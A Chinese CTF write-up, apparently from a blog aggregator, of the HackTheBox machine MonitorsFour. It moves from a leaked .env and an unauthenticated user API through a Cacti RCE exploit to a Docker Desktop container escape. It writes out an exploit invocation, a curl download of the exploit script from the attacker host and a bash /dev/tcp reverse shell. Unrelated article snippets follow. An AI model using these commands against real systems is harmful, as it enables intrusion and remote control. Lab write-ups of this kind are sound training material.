news 2026/7/14 1:17:21

HTB MonitorsFour 靶机实战记录:从越权访问到容器逃逸的完整攻击链

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
HTB MonitorsFour 靶机实战记录:从越权访问到容器逃逸的完整攻击链

靶机概览

HTB MonitorsFour 是一台难度评级为 EASY 的 Windows 靶机。该靶机以企业监控环境为背景,主要攻击路径围绕 信息泄漏、服务枚举、已知漏洞利用(CVE)与容器逃逸 展开。从外部 Web 应用入手,通过配置文件泄露获取凭据,利用 Cacti 系统的高危 RCE 漏洞进入容器内部,最终借助 Docker Desktop 的容器逃逸漏洞突破边界,成功控制底层 Windows 宿主系统。整个过程清晰地展示了从外网渗透到容器逃逸的完整链条,为理解 Windows 环境下容器化服务的常见安全风险与攻击面提供了典型的实战案例。


信息收集

端口扫描

使用 Rustscan 和 Nmap 进行初步扫描:

rustscan -a 10.10.11.98 --ulimit 5000
nmap -sV -sC -p 80,5985 10.10.11.98 -Pn -v

发现服务:

  • 80/tcp - HTTP (nginx) - 重定向到 monitorsfour.htb
  • 5985/tcp - HTTP (Microsoft HTTPAPI) - WinRM 服务

子域名枚举

使用 FFuF 进行子域名枚举:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt \ -H "Host: FUZZ.monitorsfour.htb" \ -u http://monitorsfour.htb \ -fs 138

发现子域名:

  • cacti.monitorsfour.htb - Cacti 监控系统

目录枚举

使用 dirsearch 发现敏感文件:

dirsearch -u http://monitorsfour.htb -e php,html,js,json,txt

关键发现:

  • /.env - 包含数据库凭据
  • /user - API 端点
  • /login - 登录页面

初始访问

数据库信息泄漏

访问http://monitorsfour.htb/.env泄露数据库配置:

DB_HOST=mariadb DB_PORT=3306 DB_NAME=monitorsfour_db DB_USER=monitorsdbuser DB_PASS=f37p2j8f4t0r

未授权信息泄露

访问http://monitorsfour.htb/api/v1/users?token=0&id=x返回用户数据,包含:

[ { "id": 2, "username": "admin", "email": "admin@monitorsfour.htb", "password": "56b32eb43e6f15395f6c46c1c9e1cd36", "role": "super user", "token": "d8a25ad7bdb87198d0", "name": "Marcus Higgins", "position": "System Administrator" } // ... 其他用户 ]


密码破解

使用 CrackStation 破解 MD5 哈希:

  • 56b32eb43e6f15395f6c46c1c9e1cd36wonderful1

访问管理面板

使用凭据admin:wonderful1成功登录


查看更新日志

访问http://monitorsfour.htb/admin/changelog

关键更新:

  • V.1.9 (June 2, 2025) - API 用户集成,支持令牌认证
  • V.1.7 (May 16, 2025) - 迁移到 Windows 和 Docker Desktop 4.44.2
  • V.1.6 (May 1, 2025) - 修复忘记密码功能的 SQL 注入漏洞

CVE-2025-24367 - Cacti RCE 漏洞

搜索发现 Cacti 1.2.28 存在 RCE 漏洞CVE-2025-24367对于漏洞利用需要已认证的Cacti用户


枚举 Cacti 用户

使用 Burp Suite 对http://cacti.monitorsfour.htb/进行爆破:

成功获取凭据:marcus:wonderful1


获取反向 Shell

使用公开的 PoC:

python3 exploit.py -u marcus -p wonderful1 -i 10.10.16.11 -l 4033 -url http://cacti.monitorsfour.htb


环境探测

检查挂载点

mount

发现是容器环境,路径中包含 desktop-containerd,这明确指向 Docker Desktop 环境,changelog说明了其版本为4.44.2。


Docker Desktop 逃逸漏洞 - CVE-2025-9074

搜索发现 Docker Desktop 4.44.2 存在容器逃逸漏洞CVE-2025-9074


访问 Docker API

curl -s http://192.168.65.7:2375/version

成功访问 Docker API,确认存在未受保护的 Docker 守护进程。


Docker 逃逸

准备 POC

攻击机开启 HTTP 服务器

python3 -m http.server 8033

容器内下载

curl http://10.10.16.11:8033/cve-2025-9074.sh -o cve-2025-9074.sh

执行容器逃逸
./cve-2025-9074.sh 192.168.65.7 "bash -c 'bash -i >& /dev/tcp/10.10.16.11/1033 0>&1'" 2375

成功获得 root shell


Flag 获取

获取 user flag

cat /host_root/run/desktop/mnt/host/c/Users/marcus/Desktop/user.txt

获取 root flag

cat /host_root/run/desktop/mnt/host/c/Users/Administrator/Desktop/root.txt

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/14 7:50:09

59、本地安全管理与审计指南

本地安全管理与审计指南 在系统管理中,本地安全管理至关重要,它涉及用户访问审计、资源限制设置以及特殊权限文件的管理等多个方面。以下将详细介绍相关的管理和审计方法。 1. 用户访问审计 在很多情况下,我们需要查看系统用户的访问情况,比如排查潜在的安全漏洞、为公司…

作者头像 李华
网站建设 2026/7/14 5:02:08

MindSpore 模型部署的2 种轻量落地方案

很多同学训练好 MindSpore 模型后,不知道怎么快速落地用起来,分享 2 个我常用的轻量部署方案,零基础也能搞定~方案 1:端侧本地部署(用 MindSpore Lite)适合把模型装到手机 / 嵌入式设备&#xf…

作者头像 李华
网站建设 2026/7/14 19:54:22

Flutter 原生开发指南

欢迎大家加入开源鸿蒙跨平台开发者社区,一起共建开源鸿蒙跨平台生态。### # Flutter 原生开发指南 Flutter 是由 Google 开发的开源 UI 软件开发工具包,用于构建高性能、高保真的跨平台应用程序。它采用 Dart 编程语言,并提供了丰富的组件库…

作者头像 李华
网站建设 2026/7/12 17:18:47

35道常见的前端vue面试题,零基础入门到精通,收藏这篇就够了

来源 | https://segmentfault.com/a/1190000021936876 今天这篇文章给大家分享一些常见的前端vue面试题。有一定的参考价值,有需要的朋友可以参考一下,希望对大家有所帮助。 对于前端来说,尽管css、html、js是主要的基础知识,但…

作者头像 李华
网站建设 2026/7/9 23:27:58

GTH系列模组介绍

Toyo(东佑达)GTH 系列是一款轨道内嵌式丝杆模组,是该品牌经典 ETH 系列的升级款,包含 GTH4、GTH5、GTH8、GTH12 等多个单轴型号,还有 GTH4D、GTH5D 等双滑座型号TOYO东佑达。其凭借高精度、高刚性等优势,广…

作者头像 李华
网站建设 2026/7/14 19:01:55

BlenderMCP革命性AI辅助3D建模:从零到专业场景的智能创作指南

BlenderMCP革命性AI辅助3D建模:从零到专业场景的智能创作指南 【免费下载链接】blender-mcp 项目地址: https://gitcode.com/GitHub_Trending/bl/blender-mcp 引言:AI如何重塑3D建模工作流? 你是否曾经面对空白Blender场景时感到无从…

作者头像 李华